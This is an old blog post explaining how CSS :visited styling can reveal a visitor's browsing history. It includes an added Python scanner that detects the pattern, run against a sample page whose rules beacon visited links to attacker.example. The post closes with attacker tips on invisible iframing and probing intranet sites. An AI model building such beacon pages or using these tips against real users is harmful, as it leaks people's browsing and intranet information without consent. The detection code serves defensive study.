Stealing Browser History the Metasploit Way

January 29th, 2009

The act of “stealing” browser history using various web technologies has been around for a while. You may have seen this version of the attack in Jeremiah Grossman’s slides from HITBSecConf 2008, and we followed a PoC and writeup posted by RSnake.

So in short, the gist is this…

  1. The Victim requests a page from the Attacker.
  2. The Attacker sends a specially crafted HTML page containing links for all the URLs he would like to check, each with a corresponding unique style.
  3. The Victim’s browser renders the page, firing off a CSS style for each visited link.
  4. The CSS makes a GET request using background:url(location);
  5. The Attacker handles the GET and uses it to determine which URL was hit.
  6. The Attacker sends back a 404 to keep the browser moving.
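As an added example (not code from the original post or from the Metasploit module it describes), the following scanner looks for the fingerprint of steps 2 through 4 in a page: a `:visited` rule whose declaration block loads a `url(...)`. The sample page is constructed for the example; `attacker.example` and the `#lN` ids are placeholders, and only inline `<style>` blocks are inspected.

```python
import re
from urllib.parse import urlsplit

# Constructed sample page mimicking the technique described above:
# one <a> per probed URL, each with a unique id, and a :visited rule
# per id that loads a background image from the attacker's server.
# The #l2 rule and the :hover rule are benign and must not be flagged.
SAMPLE_HTML = """<html><head><style>
#l0:visited { background: url(http://attacker.example/hit?u=0); }
#l1:visited { background: url('http://attacker.example/hit?u=1'); }
#l2:visited { color: red; }
a:hover { background: url(/img/hover.png); }
</style></head><body>
<a id="l0" href="http://intranet.example/">x</a>
<a id="l1" href="http://bank.example/login">x</a>
<a id="l2" href="http://news.example/">x</a>
</body></html>"""

STYLE_RE = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)


def find_visited_probes(html):
    """Return (selector, beacon_url) for every CSS rule that styles a
    :visited link with a url() load. A visited-only resource fetch is the
    channel this technique relies on, so each hit is a history probe."""
    probes = []
    for sheet in STYLE_RE.findall(html):
        for selector, body in RULE_RE.findall(sheet):
            selector = selector.strip()
            if ":visited" not in selector.lower():
                continue
            for beacon in URL_RE.findall(body):
                probes.append((selector, beacon))
    return probes


def beacon_hosts(probes):
    """Distinct hosts that would receive the visited-link GETs; a single
    host collecting many probes is the server from step 5."""
    return sorted({urlsplit(url).hostname for _, url in probes
                   if urlsplit(url).hostname})


if __name__ == "__main__":
    for selector, beacon in find_visited_probes(SAMPLE_HTML):
        print(f"probe: {selector} -> {beacon}")
    print("beacon hosts:", beacon_hosts(find_visited_probes(SAMPLE_HTML)))
```

Modern browsers restrict what `:visited` may change to colour properties, which closes this channel; the scanner is still useful for spotting the pattern in captured pages.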

Easy enough. Now, let’s make it convenient to alter/switch the URL lists. Here’s the code.

Just to be clear, I don’t really consider this “stealing” the history. It’s more like playing a question game, where if you ask the right questions, the client will confirm. That said, we CAN ask a lot of questions.

Suggestions:

  • Play with iframing it into another page invisibly
  • Play with it in Firefox (which seems to rerender the styles as URLs are hit in other tabs :)
  • Attempt to gain intranet information
